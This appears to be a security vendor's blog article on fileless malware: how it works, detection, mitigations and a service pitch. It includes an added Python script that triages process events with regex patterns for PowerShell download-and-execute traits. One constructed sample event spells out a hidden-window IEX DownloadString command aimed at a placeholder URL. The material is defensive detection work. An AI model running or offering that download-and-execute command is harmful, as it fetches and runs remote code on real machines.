Fileless Malware

Protecting Your System from Zero-Footprint Cyber-Attacks

Cybercriminals are continually looking for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless or macro attack. This type of attack does not install software on a computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten times more likely to succeed than file-based attacks, and they estimate that over 75% of successful cyberattacks in 2017 were fileless.

Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user to click a suspicious link or open a malicious file; however, they don’t need to install detectable files on a computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily discoverable artifacts behind.


Anatomy of a Zero-Footprint Attack

Here’s an example of how a zero-footprint attack works:

  1. A user clicks a link to a malicious website.
  2. The website loads Flash.
  3. Flash is used to open the Windows PowerShell utility.
  4. PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
  5. The PowerShell script locates the user’s critical data and sends it to the attacker.


Detecting Zero-Footprint Attacks

Fortunately, “zero-footprint” is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link, even when there is no executable file installed. However, zero-footprint malware is hidden in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for a longer period of time.
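
The anatomy above (a browser-hosted component starting PowerShell, which fetches and runs a script in memory) leaves traces in process-creation telemetry even though no file is written. The following is an added example, not part of the original article: a Python triage over constructed events, where the field names (image, parent_image, command_line), the process lists and the threshold are assumptions for illustration.

```python
import re

# Assumed lists for illustration; tune both to your own environment.
SUSPICIOUS_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe",
                      "flashplayerplugin.exe", "winword.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Command-line traits of "download a script and run it from memory".
INDICATORS = {
    "network_fetch": re.compile(r"net\.webclient|downloadstring|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded_command": re.compile(r"\s-(e|ec|enc\w*)\s", re.I),
    "hidden_window": re.compile(r"\s-w\w*\s+hidden", re.I),
}

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the reasons a process-creation event looks like a fileless launch."""
    if basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    reasons = []
    if basename(event["parent_image"]) in SUSPICIOUS_PARENTS:
        reasons.append("unusual_parent")
    reasons += [n for n, rx in INDICATORS.items() if rx.search(event["command_line"])]
    return reasons

def triage(events, threshold=2):
    """Keep events with at least `threshold` reasons, so one weak signal alone is ignored."""
    scored = ((ev, score_event(ev)) for ev in events)
    return [(ev, reasons) for ev, reasons in scored if len(reasons) >= threshold]

# Constructed sample events (hypothetical field names, made-up hosts and paths).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -Command Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\Temp\tool.zip"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "command_line": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('<constructed-url>')\""},
]

if __name__ == "__main__":
    for ev, reasons in triage(SAMPLE_EVENTS):
        print(basename(ev["parent_image"]), "->", basename(ev["image"]), reasons)
```

Only the third event is reported: the scheduled backup script has no indicators, and the administrator's download to disk has a single one, which stays below the threshold.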


Combatting Zero-Footprint Attacks

Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:

  • Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version
  • Educate your users on the dangers of downloading email attachments or clicking on suspicious links
  • Restrict access to administrative tools like WMI, PowerShell, and AppleScript that cybercriminals can leverage for attacks
  • Restrict the number of domain administrators who have full access to domain settings
  • Harden your firewalls, endpoint protection, email security, and web blockers
  • Employ behavior-based network security that enforces rules based on users’ actions and does not rely on signature-based malware detection


No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools can slow down or derail cyberattackers and increase the probability that they will make mistakes that expose their presence or reveal their attack vector.

Cerium can help

Chances are, zero-footprint attacks will continue to get smarter and become more common. Cerium offers a variety of services and technology to help organizations prevent a wide range of cyberattacks, including zero-footprint attacks. Contact a Cerium cybersecurity expert to get the latest on cybersecurity trends, advice for protecting your network, tips for spotting security compromises, and guidelines for mitigating risks after a breach.
